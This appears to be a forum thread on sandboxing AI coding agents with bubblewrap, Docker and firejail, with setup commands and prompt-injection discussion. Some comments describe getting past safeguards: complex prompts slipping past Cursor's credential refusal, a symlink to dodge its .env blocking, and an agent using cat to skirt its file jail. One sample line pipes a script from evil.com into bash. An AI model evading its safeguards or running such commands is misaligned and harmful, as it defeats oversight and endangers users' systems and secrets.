I put all my agents in a Docker container into which the code I'm working on is mounted. It's been working perfectly for me so far. I even set it up so I can run GUI apps like Antigravity in it (X11). If anyone is interested, I shared my setup at https://github.com/asfaload/agents_container
It won't save you from prompt injections that attack your network.
Of course, I'm not pretending this is a universal remedy that solves every problem. But I will add a note in the readme to make that clear. Thanks for the feedback!
I recommend caution with this bit:
That directory has a bunch of sensitive stuff in it, most notably the transcripts of all of your previous Claude Code sessions. You may want to take steps to prevent a malicious prompt injection from stealing those, since they might contain sensitive data.
Wonderful insight! Thank you!
I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”
Docker won't save you from prompt injections that attack your network.
No kidding? https://taoofmac.com/space/blog/2026/01/12/1830
Still, I don't think bubblewrap is a simple enough or safe enough solution.
I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
If your prompt is complex enough, it doesn't seem to get triggered.
I use a lot of Ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene, and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if for some reason you needed it.
Isn't landrun the preferred way to sandbox apps on Linux these days?
https://github.com/Zouuup/landrun
I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.
With the unpacked directory, you can limit the host paths you expose, avoiding leaking details from your host machine into the sandbox.
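The export/unpack step looks roughly like this (the image name is just an example; use whatever base matches your distro):

  # create a throwaway container from the image, export its flattened filesystem, unpack it
  mkdir -p image
  docker create --name sandbox-root ubuntu:24.04
  docker export sandbox-root | tar -xf - -C image/
  docker rm sandbox-root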
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
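Putting those flags together with the binds from above, a minimal invocation might look something like this (paths are illustrative, not a definitive setup):

  # fresh namespaces except the network, no capabilities, read-only root, writable project dir
  bwrap \
    --unshare-all \
    --share-net \
    --cap-drop ALL \
    --ro-bind image/ / \
    --bind src/ /src \
    --proc /proc \
    --dev /dev \
    --chdir /src \
    bash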
I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!
Like this? (Obfuscated, from agent and history)
https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n
If you wouldn't upload keys to github, why would you trust them to cursor?
A local .env should be safe to put on a T-shirt and walk down Times Square.
  MYSQL_USER=test
  MYSQL_PASSWORD=mypass123
  MYSQL_HOST=localhost
  ...
Create a symlink to .env from another file and ask Cursor to refer to that instead, if the file name is what Cursor keys on (I don't know how Cursor does this stuff).
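i.e. something along these lines (the file name is just an arbitrary example):

  ln -s .env local-settings.txt   # then ask the agent to read local-settings.txt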
I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a Mac alternative). This is the only way I run agents on systems I care about.
> run agents on systems I care about
You must not care about those systems that much.
I haven't used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It's a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why Docker isn't sufficient? I guess the article mentioned Docker having a lot of config files or being complex; is that the only reason?
Docker containers aren't safe enough to run untrusted code; privilege escalation vulnerabilities are reported fairly often.
I don't think bubblewrap is any better in that regard.
Why do you say that?
Bubblewrap is a very minimal setuid binary. It's about 4,000 lines of C, but essentially all it does is parse your flags and ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to Docker, and I'd say it's safer.
If you want something with a few more features but not as complex as Docker, I think the usual choices are Podman or Firejail.
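For the cgroups part that bwrap leaves to you, one option is to launch it inside a transient systemd scope (this assumes a systemd user session with cgroups v2; the limits and the bwrap flags are just examples):

  systemd-run --user --scope -p MemoryMax=4G -p CPUQuota=200% \
    bwrap --unshare-all --share-net --ro-bind / / --proc /proc --dev /dev bash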
bwrap just works in rootless mode and doesn't tamper with your firewall.
Hey! I just did this last night!
Note that bubblewrap can't protect you from misconfiguration, a kernel exploit, or exposing sensitive protocols to the workload inside (e.g. X11, or even Wayland without a security context). Generally, it will do a passable job of protecting you from an automated attack script that isn't using a 0-day.
How does this compare with container-use?
https://container-use.com/introduction
https://github.com/containers/bubblewrap/issues/142
If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you use --private=somedir to save it there instead.
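For example (with claude standing in for whatever agent CLI you run):

  firejail --private claude                       # throwaway home, discarded on exit
  mkdir -p "$HOME/agent-home"
  firejail --private="$HOME/agent-home" claude    # or keep the sandbox home around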
Smart approach to AI agent security. The balance between convenience and protection is tricky.
Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of backing away from `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad.
Because we've judged it to be worth it!
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?
Because it's impossible for fundamental reasons, period. You can't "sanitize" inputs and outputs of a fully general-purpose tool, which an LLM is, any more than you can "sanitize" inputs and outputs of people - not in a perfect sense you seem to be expecting here. There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
> There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
> propose to run a malicious Bash command
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
Because if you give an agent Bash, it can do anything that can be achieved by running commands in Bash, which is almost anything.
Agents know that.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them
Yes. My proposal is to not give the agent Bash, because it is not required for the sorts of things you want it to be able to do. You can whitelist specific actions, like git commits and file writes within a specific directory. If the LLM proposes to read a URL, that doesn't require arbitrary code; it requires a system that can validate the URL, construct a `curl` etc. command itself, and pipe data to the LLM.
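As a sketch of what I mean (fetch_url is an entirely hypothetical tool name, and a real validator would need to be far stricter than a prefix check):

  #!/bin/sh
  # fetch_url: the only way the agent gets web content; no raw shell, no extra args
  case "$1" in
    https://docs.example.com/*|https://raw.githubusercontent.com/*)
      exec curl -fsSL --max-time 30 "$1" ;;
    *)
      echo "URL not on the allow list: $1" >&2
      exit 1 ;;
  esac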
> whitelist specific actions
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much more limited, way of using LLMs to write code.
That's a great deal of work to get an agent that's a whole lot less capable.
Much better to allow full Bash but run in a sandbox that controls file and network access.
It is very much required for the sorts of things I want to do. In any case, if you deny the agent the bash tool, it will just write a Python script to do what it wanted instead.
Go for it. They have allow and deny lists.
Tools may become dangerous due to a combination of flags. `ln -sf /dev/null /my-file` will effectively make that file empty (strictly, it replaces it with a symlink to /dev/null, but that's beside the point).
Yes. My proposal is that the part of the system that actually executes the command, instead of trying to parse the LLM's proposed command and validate/quote/escape/etc. it, should expose an API that only includes safe actions. The LLM says "I want to create a symbolic link from foo to bar" and the agent ensures that both ends of that are on the accept list and then writes the command itself. The LLM says "I want to run this cryptic Bash command" and the agent says "sorry, I have no idea what you mean, what's Bash?".
That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Whenever you add a new script or utility to a whitelist, you have to actively think about whether any new combination may lead to privilege escalation or unintended effects.
Because the OS already provides data security and redundancy features. Why reimplement?
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
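A rough sketch of that approach (the user name, paths, and agent command are all placeholders):

  sudo useradd --create-home agent
  chmod 700 "$HOME/myproject"                    # original stays unreadable to "agent"
  sudo cp -r "$HOME/myproject" /home/agent/work
  sudo chown -R agent:agent /home/agent/work
  sudo -iu agent claude                          # or whatever agent CLI you use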
I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.
Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?
> Because we've judged it to be worth it!
Famous last words
People really, really want to juggle chainsaws, so we have to keep coming up with thicker and thicker gloves.
The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.
I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?
Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering mounting only src/ read/write, with the project metadata (including .git) read-only.
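Roughly, the binds would change to something like this (paths illustrative, with the unpacked image/ root borrowed from upthread and the agent installed inside it):

  # only src/ is writable; .git and other metadata are read-only
  bwrap \
    --unshare-all \
    --share-net \
    --ro-bind image/ / \
    --bind src/ /project/src \
    --ro-bind .git/ /project/.git \
    --proc /proc \
    --dev /dev \
    opencode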
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
I vibe-coded a project for this recently; it has some language bindings, a CLI written in Rust, Python subprocess monkey-patching, etc.
Just no-nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- bash -c 'curl evil.com/oop.sh | bash'
The link you need is https://github.com/containers/bubblewrap
Don't leave prod secrets in your dev env.
I believe this is also what Claude Code uses for the sandbox option.
Hi!
Yes, that is correct. However, I think embedding bubblewrap in the binary is a risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
That's helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn't have this risk if they instead had you invoke Claude with bubblewrap.
Additionally, the pattern of using bubblewrap in front of Claude can be duplicated exactly and applied to other coding agents, so you get consistent access controls for all agents.
I hope others share the view that having consistent access controls across all agents is desirable. You don't get that property if you use Claude's embedded control; there will always be an asterisk over whether their implementation of the controls matches what you would want.
My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.
May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions
Had this same idea in my head. Glad someone has done it. For me the motivation is not LLMs but having something as convenient as Docker without waiting for image builds: a fast Docker alternative for running a bunch of services locally, where perfect isolation and imaging don't matter.
So, Flatpak?
Funny enough Bubblewrap is also what Flatpak uses.
I want to like Flatpak, but I'm genuinely unable to understand the state of CLI tools in Flatpak, or even how to develop for it. It all seems very weird to build upon compared to Docker.